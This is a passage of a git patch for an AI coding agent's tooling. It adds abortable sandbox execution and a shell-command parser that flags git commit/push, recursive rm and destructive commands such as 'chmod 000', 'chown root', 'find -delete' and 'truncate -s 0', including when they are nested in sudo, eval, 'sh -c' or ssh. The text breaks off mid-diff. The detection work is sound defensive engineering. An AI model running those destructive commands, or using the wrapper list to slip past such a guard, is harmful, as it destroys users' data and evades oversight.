From 2a4c56c858ff1e88e853656c91be66fac8b21295 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Thu, 11 Jun 2026 23:43:13 +0000
Subject: [PATCH 1/4] chore: sync public mirror from internal

---
 packages/core/src/sandbox/daytona-sandbox.ts  |  272 +++-
 src/guardian/runner.ts                        |  775 ++++++++-
 .../validators/network-policy-validator.ts    |   61 +-
 src/sandbox/docker-sandbox.ts                 |  108 +-
 src/sandbox/local-sandbox.ts                  |   92 +-
 src/sandbox/native-sandbox.ts                 |  144 +-
 src/sandbox/output-capture.ts                 |   36 +
 src/sandbox/types.ts                          |   19 +
 src/tools/bash.ts                             |    2 +-
 src/tools/gh-helpers.ts                       |  741 ++++++++-
 src/tools/gh.ts                               |   21 +-
 src/utils/url-extractor.ts                    | 1410 ++++++++++++++++-
 test/guardian/guardian-runner.test.ts         |  220 ++-
 .../core/daytona-sandbox-edge-cases.test.ts   |   19 +
 test/packages/core/daytona-sandbox.test.ts    |  230 +++
 test/safety/network-policy-validator.test.ts  |  622 +++++++-
 test/sandbox-integration.test.ts              |   18 +
 test/sandbox/docker-sandbox.test.ts           |  150 ++
 test/sandbox/local-sandbox.test.ts            |  139 ++
 .../sandbox/native-sandbox-max-buffer.test.ts |  104 ++
 test/sandbox/native-sandbox.test.ts           |   21 +
 test/tools/bash.test.ts                       |   60 +
 test/tools/gh-helpers.test.ts                 | 1059 +++++++++++++
 test/tools/gh.test.ts                         |   93 +-
 test/utils/url-extractor.test.ts              |  447 ++++++
 25 files changed, 6617 insertions(+), 246 deletions(-)
 create mode 100644 src/sandbox/output-capture.ts
 create mode 100644 test/sandbox/docker-sandbox.test.ts
 create mode 100644 test/sandbox/local-sandbox.test.ts
 create mode 100644 test/sandbox/native-sandbox-max-buffer.test.ts
 create mode 100644 test/tools/gh-helpers.test.ts
diff --git a/packages/core/src/sandbox/daytona-sandbox.ts b/packages/core/src/sandbox/daytona-sandbox.ts
index c324bce0b..44fd973fd 100644
--- a/packages/core/src/sandbox/daytona-sandbox.ts
+++ b/packages/core/src/sandbox/daytona-sandbox.ts
@@ -8,8 +8,13 @@
  * Caches the sandbox handle to avoid redundant API calls per operation.
  */
 
+import { randomUUID } from "node:crypto";
 import { Daytona } from "@daytonaio/sdk";
-import type { ExecResult, Sandbox } from "../../../../src/sandbox/types.js";
+import type {
+	ExecResult,
+	ExecWithArgsOptions,
+	Sandbox,
+} from "../../../../src/sandbox/types.js";
 
 export interface DaytonaSandboxConfig {
 	apiKey: string;
@@ -22,9 +27,216 @@ type SandboxHandle = Awaited<
 	ReturnType<InstanceType<typeof Daytona>["create"]>
 >;
 
+type DaytonaSessionCommand = {
+	cmdId?: string;
+	exitCode?: number;
+};
+
+type DaytonaSessionLogs = {
+	output?: string;
+	stdout?: string;
+	stderr?: string;
+};
+
+type DaytonaProcessApi = SandboxHandle["process"] & {
+	createSession?: (sessionId: string) => Promise<void>;
+	deleteSession?: (sessionId: string) => Promise<void>;
+	executeSessionCommand?: (
+		sessionId: string,
+		req: {
+			command: string;
+			runAsync?: boolean;
+			suppressInputEcho?: boolean;
+		},
+		timeout?: number,
+	) => Promise<DaytonaSessionCommand>;
+	getSessionCommand?: (
+		sessionId: string,
+		commandId: string,
+	) => Promise<DaytonaSessionCommand>;
+	getSessionCommandLogs?: (
+		sessionId: string,
+		commandId: string,
+	) => Promise<DaytonaSessionLogs>;
+};
+
+const SESSION_POLL_MS = 100;
+const SESSION_COMMAND_TIMEOUT_MS = 90_000;
+const EXEC_OUTPUT_MAX_BUFFER = 40 * 1024;
+
+function cancelledExecResult(): ExecResult {
+	return { stdout: "", stderr: "", exitCode: 1 };
+}
+
+function quoteShellArg(value: string): string {
+	if (/^[A-Za-z0-9_./:=@%+,-]+$/u.test(value)) {
+		return value;
+	}
+	return `'${value.replace(/'/g, `'\\''`)}'`;
+}
+
+function truncateOutput(value: string, maxBuffer?: number): string {
+	if (maxBuffer === undefined) {
+		return value;
+	}
+	const bytes = Buffer.from(value);
+	if (bytes.length <= maxBuffer) {
+		return value;
+	}
+	return bytes.subarray(0, maxBuffer).toString("utf-8");
+}
+
+function sleep(ms: number): Promise<void> {
+	return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
 export class DaytonaSandbox implements Sandbox {
 	private constructor(private handle: SandboxHandle) {}
 
+	private hasSessionApi(processApi: DaytonaProcessApi): boolean {
+		return !!(
+			processApi.createSession &&
+			processApi.deleteSession &&
+			processApi.executeSessionCommand &&
+			processApi.getSessionCommand &&
+			processApi.getSessionCommandLogs
+		);
+	}
+
+	private buildShellCommand(
+		command: string,
+		cwd?: string,
+		env?: Record<string, string>,
+	): string {
+		let fullCommand = command;
+		if (env && Object.keys(env).length > 0) {
+			const envPrefix = Object.entries(env)
+				.map(([k, v]) => {
+					if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(k)) {
+						throw new Error(`Invalid environment variable name: ${k}`);
+					}
+					const escaped = v.replace(/'/g, "'\\''");
+					return `${k}='${escaped}'`;
+				})
+				.join(" ");
+			fullCommand = `${envPrefix} ${fullCommand}`;
+		}
+		if (cwd) {
+			const escapedCwd = cwd.replace(/'/g, "'\\''");
+			fullCommand = `cd '${escapedCwd}' && ${fullCommand}`;
+		}
+		return fullCommand;
+	}
+
+	private async execWithSession(
+		command: string,
+		options: ExecWithArgsOptions = {},
+	): Promise<ExecResult> {
+		const processApi = this.handle.process as DaytonaProcessApi;
+		if (!this.hasSessionApi(processApi)) {
+			if (options.signal?.aborted) {
+				return cancelledExecResult();
+			}
+			if (options.signal) {
+				throw new Error(
+					"Daytona abortable execution requires session API support",
+				);
+			}
+			const result = await processApi.executeCommand(command);
+			return {
+				stdout: truncateOutput(result.result, options.maxBuffer),
+				stderr: "",
+				exitCode: result.exitCode,
+			};
+		}
+
+		const sessionId = `maestro-exec-${randomUUID()}`;
+		let sessionDeleted = false;
+		let sessionDeletePromise: Promise<void> | undefined;
+		const deleteSession = async (): Promise<void> => {
+			if (sessionDeleted) {
+				return;
+			}
+			if (sessionDeletePromise) {
+				await sessionDeletePromise;
+				if (sessionDeleted) {
+					return;
+				}
+			}
+			sessionDeletePromise = (async () => {
+				try {
+					await processApi.deleteSession!(sessionId);
+					sessionDeleted = true;
+				} catch {
+					// The session may not exist yet during setup cancellation.
+				} finally {
+					sessionDeletePromise = undefined;
+				}
+			})();
+			await sessionDeletePromise;
+		};
+		const abortSession = (): void => {
+			void deleteSession();
+		};
+		options.signal?.addEventListener("abort", abortSession, { once: true });
+
+		try {
+			if (options.signal?.aborted) {
+				return cancelledExecResult();
+			}
+			await processApi.createSession(sessionId);
+			if (options.signal?.aborted) {
+				return cancelledExecResult();
+			}
+
+			const response = await processApi.executeSessionCommand(sessionId, {
+				command,
+				runAsync: true,
+				suppressInputEcho: true,
+			});
+			if (!response.cmdId) {
+				throw new Error("Daytona session command did not return a command id");
+			}
+
+			const startedAt = Date.now();
+			while (!options.signal?.aborted) {
+				if (Date.now() - startedAt >= SESSION_COMMAND_TIMEOUT_MS) {
+					throw new Error("Daytona session command timed out");
+				}
+				const commandState = await processApi.getSessionCommand(
+					sessionId,
+					response.cmdId,
+				);
+				if (options.signal?.aborted) {
+					return cancelledExecResult();
+				}
+				if (typeof commandState.exitCode === "number") {
+					const logs = await processApi.getSessionCommandLogs(
+						sessionId,
+						response.cmdId,
+					);
+					if (options.signal?.aborted) {
+						return cancelledExecResult();
+					}
+					return {
+						stdout: truncateOutput(
+							logs.stdout ?? logs.output ?? "",
+							options.maxBuffer,
+						),
+						stderr: truncateOutput(logs.stderr ?? "", options.maxBuffer),
+						exitCode: commandState.exitCode,
+					};
+				}
+				await sleep(SESSION_POLL_MS);
+			}
+
+			return cancelledExecResult();
+		} finally {
+			options.signal?.removeEventListener("abort", abortSession);
+			await deleteSession();
+		}
+	}
+
 	/**
 	 * Create a new Daytona sandbox. This is async because it provisions
 	 * a remote sandbox environment.
@@ -49,28 +261,21 @@ export class DaytonaSandbox implements Sandbox {
 		command: string,
 		cwd?: string,
 		env?: Record<string, string>,
+		signal?: AbortSignal,
 	): Promise<ExecResult> {
 		try {
-			// Build command with env vars and cwd if provided
-			let fullCommand = command;
-			if (env && Object.keys(env).length > 0) {
-				const envPrefix = Object.entries(env)
-					.map(([k, v]) => {
-						if (!/^[A-Za-z_][A-Za-z0-9_]*$/.test(k)) {
-							throw new Error(`Invalid environment variable name: ${k}`);
-						}
-						// Use single quotes to prevent shell interpretation
-						const escaped = v.replace(/'/g, "'\\''");
-						return `${k}='${escaped}'`;
-					})
-					.join(" ");
-				fullCommand = `${envPrefix} ${fullCommand}`;
+			const fullCommand = this.buildShellCommand(command, cwd, env);
+			const processApi = this.handle.process as DaytonaProcessApi;
+			if (signal?.aborted) {
+				return cancelledExecResult();
 			}
-			if (cwd) {
-				const escapedCwd = cwd.replace(/'/g, "'\\''");
-				fullCommand = `cd '${escapedCwd}' && ${fullCommand}`;
+			if (signal && this.hasSessionApi(processApi)) {
+				return await this.execWithSession(fullCommand, {
+					signal,
+					maxBuffer: EXEC_OUTPUT_MAX_BUFFER,
+				});
 			}
-			const result = await this.handle.process.executeCommand(fullCommand);
+			const result = await processApi.executeCommand(fullCommand);
 			return {
 				stdout: result.result,
 				stderr: "",
@@ -85,6 +290,35 @@ export class DaytonaSandbox implements Sandbox {
 		}
 	}
 
+	async execWithArgs(
+		command: string,
+		args: string[] = [],
+		options: ExecWithArgsOptions = {},
+	): Promise<ExecResult> {
+		try {
+			const fullCommand = this.buildShellCommand(
+				[command, ...args].map(quoteShellArg).join(" "),
+				options.cwd,
+				options.env,
+			);
+			if (options.signal) {
+				return await this.execWithSession(fullCommand, options);
+			}
+			const result = await this.handle.process.executeCommand(fullCommand);
+			return {
+				stdout: truncateOutput(result.result, options.maxBuffer),
+				stderr: "",
+				exitCode: result.exitCode,
+			};
+		} catch (err) {
+			return {
+				stdout: "",
+				stderr: err instanceof Error ? err.message : String(err),
+				exitCode: 1,
+			};
+		}
+	}
+
 	async readFile(path: string): Promise<string> {
 		const content = await this.handle.fs.downloadFile(path);
 		return typeof content === "string" ? content : content.toString("utf-8");
diff --git a/src/guardian/runner.ts b/src/guardian/runner.ts
index 8f8729392..a287549a7 100644
--- a/src/guardian/runner.ts
+++ b/src/guardian/runner.ts
@@ -10,7 +10,7 @@ import {
 	writeFileSync,
 } from "node:fs";
 import os from "node:os";
-import { dirname, join, resolve } from "node:path";
+import { basename, dirname, join, resolve } from "node:path";
 import { resolveGuardianConfig } from "./config.js";
 import { loadGuardianState, recordGuardianRun } from "./state.js";
 import { DEFAULT_EXCLUDES } from "./types.js";
@@ -844,21 +844,39 @@ export function shouldGuardCommand(command: string): {
 	shouldGuard: boolean;
 	trigger: string | null;
 } {
-	const inlineDisable = /MAESTRO_GUARDIAN\s*=\s*(0|false|off|no)/i;
-	if (inlineDisable.test(command)) {
-		return { shouldGuard: false, trigger: null };
+	const commandSequences = tokenizeGuardianCommand(command);
+	const normalizedSequences =
+		normalizeGuardianCommandSequences(commandSequences);
+
+	const trigger = findGuardTriggerInSequences(normalizedSequences);
+	if (trigger) {
+		return { shouldGuard: true, trigger };
+	}
+
+	const nestedTrigger = findNestedGuardTrigger(command);
+	if (nestedTrigger) {
+		return { shouldGuard: true, trigger: nestedTrigger };
 	}
-	const gitMatch = command.match(/\bgit\s+(commit|push)\b/i);
-	if (gitMatch?.[1]) {
-		return { shouldGuard: true, trigger: `git ${gitMatch[1].toLowerCase()}` };
+
+	return { shouldGuard: false, trigger: null };
+}
+
+function findGuardTriggerInSequences(
+	normalizedSequences: string[][],
+): string | null {
+	for (const tokens of normalizedSequences) {
+		const gitSubcommand = findGitSubcommand(tokens);
+		if (gitSubcommand === "commit" || gitSubcommand === "push") {
+			return `git ${gitSubcommand}`;
+		}
+
+		const rmTrigger = findRmTrigger(tokens);
+		if (rmTrigger) {
+			return rmTrigger;
+		}
 	}
 
 	const destructivePatterns: Array<{ regex: RegExp; label: string }> = [
-		{ regex: /\brm\s+-rf\b/i, label: "rm -rf" },
-		{
-			regex: /\brm\s+(?:-[a-z]*r[a-z]*\b|--recursive\b)/i,
-			label: "rm -r",
-		},
 		{ regex: /\bfind\s+[^\n]*-delete\b/i, label: "find -delete" },
 		{ regex: /\bchmod\s+0{3,4}\b/i, label: "chmod 000" },
 		{ regex: /\bchown\b[^\n]*\broot\b/i, label: "chown root" },
@@ -867,13 +885,738 @@ export function shouldGuardCommand(command: string): {
 		{ regex: /\btruncate\s+-s\s+0\b/i, label: "truncate -s 0" },
 	];
 
-	for (const pattern of destructivePatterns) {
-		if (pattern.regex.test(command)) {
-			return { shouldGuard: true, trigger: pattern.label };
+	for (const tokens of normalizedSequences) {
+		const parsedCommand = tokens.join(" ");
+		for (const pattern of destructivePatterns) {
+			if (pattern.regex.test(parsedCommand)) {
+				return pattern.label;
+			}
 		}
 	}
 
-	return { shouldGuard: false, trigger: null };
+	return null;
+}
+
+function findNestedGuardTrigger(command: string): string | null {
+	const pending = [
+		...extractShellSubstitutions(command),
+		...extractNestedInlineGuardianCommands(command),
+	];
+	const seen = new Set<string>();
+
+	while (pending.length > 0) {
+		const nestedCommand = pending.pop();
+		if (!nestedCommand || seen.has(nestedCommand)) {
+			continue;
+		}
+		seen.add(nestedCommand);
+
+		const normalizedSequences = normalizeGuardianCommandSequences(
+			tokenizeGuardianCommand(nestedCommand),
+		);
+		const trigger = findGuardTriggerInSequences(normalizedSequences);
+		if (trigger) {
+			return trigger;
+		}
+
+		pending.push(...extractShellSubstitutions(nestedCommand));
+		pending.push(...extractNestedInlineGuardianCommands(nestedCommand));
+	}
+	return null;
+}
+
+function extractNestedInlineGuardianCommands(command: string): string[] {
+	return tokenizeGuardianCommand(command).flatMap((tokens) => {
+		const normalized = normalizeGuardianCommandTokens(tokens);
+		if (normalized.length === 0) {
+			return [];
+		}
+		return [
+			...extractInlineShellCommands(normalized),
+			...extractEvalCommands(normalized),
+		];
+	});
+}
+
+function extractShellSubstitutions(command: string): string[] {
+	const substitutions: string[] = [];
+	let quote: "'" | '"' | null = null;
+
+	for (let index = 0; index < command.length; index += 1) {
+		const char = command[index];
+		if (char === "\\") {
+			index += 1;
+			continue;
+		}
+		if (quote === "'") {
+			if (char === "'") {
+				quote = null;
+			}
+			continue;
+		}
+		if (quote === '"' && char === '"') {
+			quote = null;
+			continue;
+		}
+		if (!quote && char === "'") {
+			quote = char;
+			continue;
+		}
+		if (!quote && char === '"') {
+			quote = char;
+			continue;
+		}
+		if (char === "`") {
+			const end = findBacktickEnd(command, index + 1);
+			if (end !== -1) {
+				substitutions.push(command.slice(index + 1, end));
+				index = end;
+			}
+			continue;
+		}
+		if (char === "$" && command[index + 1] === "(") {
+			const end = findCommandSubstitutionEnd(command, index + 2);
+			if (end !== -1) {
+				substitutions.push(command.slice(index + 2, end));
+				index = end;
+			}
+			continue;
+		}
+		if ((char === "<" || char === ">") && command[index + 1] === "(") {
+			const end = findCommandSubstitutionEnd(command, index + 2);
+			if (end !== -1) {
+				substitutions.push(command.slice(index + 2, end));
+				index = end;
+			}
+		}
+	}
+
+	return substitutions;
+}
+
+function findBacktickEnd(command: string, start: number): number {
+	for (let index = start; index < command.length; index += 1) {
+		if (command[index] === "\\") {
+			index += 1;
+			continue;
+		}
+		if (command[index] === "`") {
+			return index;
+		}
+	}
+	return -1;
+}
+
+function findCommandSubstitutionEnd(command: string, start: number): number {
+	let depth = 1;
+	let quote: "'" | '"' | "`" | null = null;
+	let escaped = false;
+
+	for (let index = start; index < command.length; index += 1) {
+		const char = command[index];
+		if (char === undefined) {
+			continue;
+		}
+
+		if (escaped) {
+			escaped = false;
+			continue;
+		}
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+		if (quote) {
+			if (char === quote) {
+				quote = null;
+			}
+			continue;
+		}
+		if (char === "'" || char === '"' || char === "`") {
+			quote = char;
+			continue;
+		}
+		if (char === "(") {
+			depth += 1;
+			continue;
+		}
+		if (char === ")") {
+			depth -= 1;
+			if (depth === 0) {
+				return index;
+			}
+		}
+	}
+
+	return -1;
+}
+
+function tokenizeGuardianCommand(command: string): string[][] {
+	const sequences: string[][] = [];
+	let tokens: string[] = [];
+	let current = "";
+	let quote: "'" | '"' | null = null;
+	let escaped = false;
+
+	const pushToken = () => {
+		if (current.length > 0) {
+			tokens.push(current);
+			current = "";
+		}
+	};
+	const pushSequence = () => {
+		pushToken();
+		if (tokens.length > 0) {
+			sequences.push(tokens);
+			tokens = [];
+		}
+	};
+
+	for (let index = 0; index < command.length; index += 1) {
+		const char = command[index];
+		if (char === undefined) {
+			continue;
+		}
+
+		if (escaped) {
+			current += char;
+			escaped = false;
+			continue;
+		}
+
+		if (quote) {
+			if (quote === '"' && char === "\\") {
+				escaped = true;
+				continue;
+			}
+			if (char === quote) {
+				quote = null;
+				continue;
+			}
+			current += char;
+			continue;
+		}
+
+		if (char === "\\") {
+			escaped = true;
+			continue;
+		}
+		if (char === "'" || char === '"') {
+			if (current.length > 0) {
+				pushToken();
+			}
+			quote = char;
+			continue;
+		}
+		if (char === "#" && current.length === 0) {
+			while (index + 1 < command.length && command[index + 1] !== "\n") {
+				index += 1;
+			}
+			continue;
+		}
+		if (/\s/.test(char)) {
+			pushToken();
+			continue;
+		}
+		if (char === ";" || char === "|" || char === "&") {
+			pushSequence();
+			if (command[index + 1] === char) {
+				index += 1;
+			}
+			continue;
+		}
+
+		current += char;
+	}
+
+	pushSequence();
+	return sequences;
+}
+
+function normalizeGuardianCommandSequences(
+	commandSequences: string[][],
+): string[][] {
+	return commandSequences.flatMap((tokens) =>
+		expandGuardianCommandTokens(tokens),
+	);
+}
+
+function expandGuardianCommandTokens(tokens: string[]): string[][] {
+	const normalized = normalizeGuardianCommandTokens(tokens);
+	if (normalized.length === 0) {
+		return [];
+	}
+
+	const inlineCommands = [
+		...extractInlineShellCommands(normalized),
+		...extractEvalCommands(normalized),
+		...extractRemoteShellCommands(normalized),
+		...extractCompoundGuardianCommands(normalized),
+	];
+	return [
+		normalized,
+		...inlineCommands.flatMap((command) =>
+			expandGuardianInlineCommand(command),
+		),
+	];
+}
+
+function expandGuardianInlineCommand(
+	command: string,
+	seen = new Set<string>(),
+): string[][] {
+	if (seen.has(command)) {
+		return [];
+	}
+	seen.add(command);
+
+	return [
+		...normalizeGuardianCommandSequences(tokenizeGuardianCommand(command)),
+		...extractShellSubstitutions(command).flatMap((nestedCommand) =>
+			expandGuardianInlineCommand(nestedCommand, seen),
+		),
+	];
+}
+
+function normalizeGuardianCommandTokens(tokens: string[]): string[] {
+	let normalized = tokens.slice();
+	let changed = true;
+
+	while (changed) {
+		changed = false;
+		normalized = stripLeadingAssignments(normalized);
+		if (normalized.length === 0) {
+			return normalized;
+		}
+
+		const command = normalized[0]?.toLowerCase();
+		if (command === "command") {
+			normalized = unwrapCommandBuiltin(normalized);
+			changed = true;
+			continue;
+		}
+		if (command === "nohup" || command === "time") {
+			normalized =
+				normalized[1] === "--" ? normalized.slice(2) : normalized.slice(1);
+			changed = true;
+			continue;
+		}
+		if (command === "sudo") {
+			normalized = unwrapSudoCommand(normalized);
+			changed = true;
+			continue;
+		}
+		if (command === "env") {
+			normalized = unwrapEnvCommand(normalized);
+			changed = true;
+		}
+	}
+
+	return normalized;
+}
+
+function unwrapCommandBuiltin(tokens: string[]): string[] {
+	let index = 1;
+	while (index < tokens.length) {
+		const token = tokens[index];
+		if (token === "--") {
+			index += 1;
+			break;
+		}
+		if (token === "-p") {
+			index += 1;
+			continue;
+		}
+		break;
+	}
+	return tokens.slice(index);
+}
+
+function stripLeadingAssignments(tokens: string[]): string[] {
+	const firstCommandIndex = tokens.findIndex(
+		(token) => !isEnvAssignment(token),
+	);
+	return firstCommandIndex === -1 ? [] : tokens.slice(firstCommandIndex);
+}
+
+function unwrapSudoCommand(tokens: string[]): string[] {
+	let index = 1;
+	while (index < tokens.length) {
+		const token = tokens[index];
+		if (token === "--") {
+			index += 1;
+			break;
+		}
+		if (!token?.startsWith("-")) {
+			break;
+		}
+		index += ["-C", "-g", "-h", "-p", "-u"].includes(token) ? 2 : 1;
+	}
+	return tokens.slice(index);
+}
+
+function unwrapEnvCommand(tokens: string[]): string[] {
+	let index = 1;
+	while (index < tokens.length) {
+		const token = tokens[index];
+		if (!token) {
+			break;
+		}
+		if (isEnvAssignment(token)) {
+			index += 1;
+			continue;
+		}
+		if (token === "-u" || token === "--unset") {
+			index += 2;
+			continue;
+		}
+		if (token.startsWith("--unset=") || token === "-i" || token === "-0") {
+			index += 1;
+			continue;
+		}
+		if (token.startsWith("-")) {
+			index += 1;
+			continue;
+		}
+		break;
+	}
+	return tokens.slice(index);
+}
+
+function isEnvAssignment(token: string): boolean {
+	return /^[A-Za-z_][A-Za-z0-9_]*=.*/.test(token);
+}
+
+const INLINE_SHELL_COMMANDS = new Set([
+	"ash",
+	"bash",
+	"dash",
+	"fish",
+	"ksh",
+	"sh",
+	"su",
+	"zsh",
+]);
+
+const REMOTE_SHELL_COMMANDS = new Set(["ssh"]);
+const SSH_OPTIONS_WITH_VALUES = new Set([
+	"-b",
+	"-c",
+	"-D",
+	"-E",
+	"-F",
+	"-i",
+	"-J",
+	"-L",
+	"-l",
+	"-m",
+	"-O",
+	"-o",
+	"-p",
+	"-Q",
+	"-R",
+	"-S",
+	"-W",
+	"-w",
+]);
+
+const SHELL_OPTIONS_WITH_VALUES = new Set([
+	"-O",
+	"+O",
+	"-o",
+	"--init-file",
+	"--rcfile",
+	"-init-file",
+	"-rcfile",
+]);
+const SHELL_COMBINABLE_COMMAND_STRING_FLAGS = new Set([
+	"a",
+	"b",
+	"e",
+	"f",
+	"h",
+	"i",
+	"k",
+	"l",
+	"m",
+	"n",
+	"p",
+	"r",
+	"s",
+	"t",
+	"u",
+	"v",
+	"x",
+	"B",
+	"C",
+	"E",
+	"H",
+	"P",
+	"T",
+]);
+
+function stripGuardianGrouping(token: string): string {
+	return token.replace(/^[({]+/, "").replace(/[)}]+$/, "");
+}
+
+function guardianCommandBasename(token: string): string {
+	const stripped = stripGuardianGrouping(token);
+	if (stripped.length === 0) {
+		return "";
+	}
+	const normalized = basename(stripped).split(/[/\\]/).pop() ?? "";
+	return normalized.toLowerCase().replace(/\.exe$/, "");
+}
+
+function extractInlineShellCommands(tokens: string[]): string[] {
+	const commands: string[] = [];
+
+	for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) {
+		const shell = guardianCommandBasename(tokens[commandIndex] ?? "");
+		if (!INLINE_SHELL_COMMANDS.has(shell)) {
+			continue;
+		}
+		const scanPastNonOptions = shell === "su";
+
+		for (let index = commandIndex + 1; index < tokens.length - 1; index += 1) {
+			const token = stripGuardianGrouping(tokens[index] ?? "");
+			if (token.length === 0) {
+				continue;
+			}
+			if (token === "--") {
+				break;
+			}
+			if (isShellCommandStringFlag(token)) {
+				let commandStringIndex = index + 1;
+				while (tokens[commandStringIndex] === "--") {
+					commandStringIndex += 1;
+				}
+				const inlineCommand = tokens[commandStringIndex];
+				if (inlineCommand) {
+					commands.push(inlineCommand);
+				}
+				break;
+			}
+			if (SHELL_OPTIONS_WITH_VALUES.has(token)) {
+				index += 1;
+				continue;
+			}
+			if (token.startsWith("-") || token.startsWith("+")) {
+				continue;
+			}
+			if (scanPastNonOptions) {
+				continue;
+			}
+			break;
+		}
+	}
+
+	return commands;
+}
+
+function isShellCommandStringFlag(token: string): boolean {
+	if (token === "-c") {
+		return true;
+	}
+	if (!/^-([A-Za-z]+)$/.test(token)) {
+		return false;
+	}
+	const flags = [...token.slice(1)];
+	const commandStringFlagIndex = flags.indexOf("c");
+	if (commandStringFlagIndex === -1) {
+		return false;
+	}
+	return flags.every(
+		(flag, index) =>
+			(index === commandStringFlagIndex && flag === "c") ||
+			SHELL_COMBINABLE_COMMAND_STRING_FLAGS.has(flag),
+	);
+}
+
+function extractEvalCommands(tokens: string[]): string[] {
+	if (guardianCommandBasename(tokens[0] ?? "") !== "eval") {
+		return [];
+	}
+
+	const command = tokens
+		.slice(1)
+		.filter((token) => token.length > 0)
+		.join(" ");
+	return command ? [command] : [];
+}
+
+function extractRemoteShellCommands(tokens: string[]): string[] {
+	const commands: string[] = [];
+
+	for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) {
+		const command = guardianCommandBasename(tokens[commandIndex] ?? "");
+		if (!REMOTE_SHELL_COMMANDS.has(command)) {
+			continue;
+		}
+
+		let index = commandIndex + 1;
+		while (index < tokens.length) {
+			const token = stripGuardianGrouping(tokens[index] ?? "");
+			if (!token) {
+				index += 1;
+				continue;
+			}
+			if (token === "--") {
+				index += 1;
+				break;
+			}
+			if (SSH_OPTIONS_WITH_VALUES.has(token)) {
+				index += 2;
+				continue;
+			}
+			if (SSH_OPTIONS_WITH_VALUES.has(token.slice(0, 2))) {
+				index += 1;
+				continue;
+			}
+			if (token.startsWith("-")) {
+				index += 1;
+				continue;
+			}
+			index += 1;
+			break;
+		}
+
+		const remoteCommand = tokens
+			.slice(index)
+			.filter((token) => token.trim().length > 0)
+			.join(" ");
+		if (remoteCommand) {
+			commands.push(remoteCommand);
+		}
+	}
+
+	return commands;
+}
+
+function extractCompoundGuardianCommands(tokens: string[]): string[] {
+	return tokens.filter((token) => isCompoundGuardianToken(token));
+}
+
+function isCompoundGuardianToken(token: string): boolean {
+	if (token.length === 0) {
+		return false;
+	}
+	const trimmed = token.trimStart();
+	if (
+		trimmed.startsWith("$(") ||
+		trimmed.startsWith("`") ||
+		trimmed.startsWith("<(") ||
+		trimmed.startsWith(">(")
+	) {
+		return false;
+	}
+	const sequences = tokenizeGuardianCommand(token);
+	if (sequences.length !== 1) {
+		return true;
+	}
+	const [sequence] = sequences;
+	return sequence?.length !== 1 || sequence[0] !== token;
+}
+
+function findGitSubcommand(tokens: string[]): string | null {
+	for (let commandIndex = 0; commandIndex < tokens.length; commandIndex += 1) {
+		if (guardianCommandBasename(tokens[commandIndex] ?? "") !== "git") {
+			continue;
+		}
+		const subcommand = findGitSubcommandFrom(tokens, commandIndex);
+		if (subcommand === "commit" || subcommand === "push") {
+			return subcommand;
+		}
+	}
+	return null;
+}
+
+function findGitSubcommandFrom(
+	tokens: string[],
+	commandIndex: number,
+): string | null {
+	for (let index = commandIndex + 1; index < tokens.length; index += 1) {
+		const token = stripGuardianGrouping(tokens[index] ?? "");
+		if (!token) {
+			continue;
+		}
+		if (GIT_OPTIONS_WITH_VALUES.has(token)) {
+			index += 1;
+			continue;
+		}
+		if (
+			GIT_OPTIONS_WITH_OPTIONAL_INLINE_VALUES.some((option) =>
+				token.startsWith(`${option}=`),
+			)
+		) {
+			continue;
+		}
+		if (token.startsWith("-")) {
+			continue;
+		}
+		return token.toLowerCase();
+	}
+
+	return null;
+}
+
+const GIT_OPTIONS_WITH_VALUES = new Set([
+	"-C",
+	"-c",
+	"--config-env",
+	"--exec-path",
+	"--git-dir",
+	"--namespace",
+	"--work-tree",
+]);
+
+const GIT_OPTIONS_WITH_OPTIONAL_INLINE_VALUES = [
+	"--config-env",
+	"--exec-path",
+	"--git-dir",
+	"--namespace",
+	"--work-tree",
+];
+
+function findRmTrigger(tokens: string[]): string | null {
+	for (let index = 0; index < tokens.length; index += 1) {
+		if (guardianCommandBasename(tokens[index] ?? "") !== "rm") {
+			continue;
+		}
+		const trigger = findRmTriggerFromArgs(tokens.slice(index + 1));
+		if (trigger) {
+			return trigger;
+		}
+	}
+	return null;
+}
+
+function findRmTriggerFromArgs(args: string[]): string | null {
+	let force = false;
+	let recursive = false;
+	for (const token of args) {
+		if (token === "--") {
+			break;
+		}
+		if (token === "--force") {
+			force = true;
+			continue;
+		}
+		if (token === "--recursive") {
+			recursive = true;
+			continue;
+		}
+		if (/^-[^-]/.test(token)) {
+			const flags = token.slice(1);
+			force ||= flags.includes("f");
+			recursive ||= flags.includes("r") || flags.includes("R");
+		}
+	}
+
+	if (!recursive) {
+		return null;
+	}
+	return force ? "rm -rf" : "rm -r";
 }
 
 export async function runGuardian(
diff --git a/src/safety/validators/network-policy-validator.ts b/src/safety/validators/network-policy-validator.ts
index d14fe2f8b..d642a548e 100644
--- a/src/safety/validators/network-policy-validator.ts
+++ b/src/safety/validators/network-policy-validator.ts
@@ -1,4 +1,5 @@
 import { lookup } from "node:dns/promises";
+import { isIP as netIsIP } from "node:net";
 import type { ActionApprovalContext } from "../../agent/action-approval.js";
 import {
 	isLocalhostAlias,
@@ -10,6 +11,7 @@ import {
 import {
 	extractUrlsFromShellCommand,
 	extractUrlsFromValue,
+	findOpaqueNetworkShellCommand,
 } from "../../utils/url-extractor.js";
 import type { EnterprisePolicy } from "../policy.js";
 
@@ -41,24 +43,49 @@ function getStringArg(
 	return typeof value === "string" ? value : null;
 }
 
+function normalizePolicyHost(host: string): string {
+	return host
+		.toLowerCase()
+		.replace(/^\[|\]$/g, "")
+		.replace(/\.+$/, "");
+}
+
+function hostMatchesPolicyEntry(host: string, policyHost: string): boolean {
+	const normalizedPolicyHost = normalizePolicyHost(policyHost);
+	return (
+		host === normalizedPolicyHost || host.endsWith(`.${normalizedPolicyHost}`)
+	);
+}
+
 /**
  * Extract URLs from tool arguments (recursively checks nested objects)
- * Also extracts URLs from curl/wget commands in bash.
+ * Also extracts statically visible network targets from bash commands.
  */
 export function extractPolicyUrls(context: ActionApprovalContext): string[] {
 	const args = getArgsObject(context);
 	if (!args) return [];
 
-	const urls = extractUrlsFromValue(args);
-
 	if (context.toolName === "bash" || context.toolName === "background_tasks") {
-		const command = getStringArg(context, "command");
-		if (command) {
+		const { command, ...nonCommandArgs } = args;
+		const urls = extractUrlsFromValue(nonCommandArgs);
